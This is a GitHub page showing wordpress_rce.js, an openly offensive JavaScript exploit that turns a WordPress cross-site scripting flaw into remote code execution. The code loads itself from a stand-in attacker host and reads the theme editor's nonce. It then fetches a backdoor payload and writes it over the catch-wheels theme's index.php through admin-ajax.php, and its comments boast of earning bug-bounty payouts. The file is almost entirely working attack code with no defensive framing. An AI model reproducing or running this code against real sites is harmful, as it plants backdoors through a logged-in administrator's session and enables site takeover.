-
Notifications
You must be signed in to change notification settings - Fork 216
/
wordpress_rce.js
69 lines (57 loc) · 1.61 KB
/
wordpress_rce.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
/*
ESCALATE WORDPRES XSS TO RCE
jQuery.getScript('https://attacker/wordpress_rce.js',function(){main()});
*/
class RCE {
constructor(){
/* Empty */
}
get_req(url){
var text;
jQuery.ajax({
type: "GET",
url: url,
datatype: "text",
async: false,
success: function(data){
text = data;
}
});
return text;
}
theme_update(file, csrf){
/* This function will upload a Backdoor inside the catch-wheel theme*/
jQuery.ajax({
type: "POST",
url: "/wp-admin/admin-ajax.php?_fs_blog_admin=true",
data: {newcontent : file, _wp_http_referer: '/wp-admin/theme-editor.php?file=index.php&theme=catch-wheels', nonce: csrf, action: 'edit-theme-plugin-file',file: 'index.php',theme: 'catch-wheels', 'docs-list':''},
success: function(){
console.log('uploaded');
},
contentType: "application/x-www-form-urlencoded"
});
}
boom_p1(csrf){
/*This function will get your P1. You can now go over Twitter and BOOM P1 everyone*/
var that = this;
var payload = that.get_req('http://127.0.0.1/wordpress_rce.txt');
that.theme_update(payload, csrf);
}
get_nonce(){
/* Retrieving the Nonce used to upload the RCE. Those are really useful and they will never gonna give you up !*/
var that = this;
var url = '/wp-admin/theme-editor.php?file=index.php&theme=catch-wheels';
var data = that.get_req(url);
return jQuery(data).find('#nonce').val();
}
run(){
var that = this;
var nonce = that.get_nonce();
console.log(nonce)
that.boom_p1(nonce);
}
}
function main(){
var exploit = new RCE();
exploit.run();
}